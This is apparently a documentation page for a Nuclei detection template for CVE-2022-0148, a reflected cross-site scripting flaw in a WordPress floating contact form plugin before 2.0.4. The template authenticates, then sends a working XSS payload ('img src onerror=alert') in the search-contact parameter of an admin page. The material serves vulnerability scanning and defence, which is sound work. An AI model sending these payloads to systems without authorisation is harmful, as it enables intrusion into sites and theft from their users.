WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting
ID: CVE-2022-0148
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio
Description
Section titled “Description”WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.
YAML Source
Section titled “YAML Source”id: CVE-2022-0148
info: name: WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting author: DhiyaneshDK severity: medium description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148 - https://plugins.trac.wordpress.org/changeset/2654453/mystickyelements - https://nvd.nist.gov/vuln/detail/CVE-2022-0148 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.00144 epss-percentile: 0.50194 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: premio product: mystickyelements framework: wordpress tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '<img src onerror=alert(`document.domain`) x">'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100f523c2d9834640f8b994bb6655932c39a6a20254fca6120c16ec105d53b65c840220761bafb5e6904abc0d28fe05b1b91003668e79c0fc25e871681aa060d4f6ec32:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0148.yaml"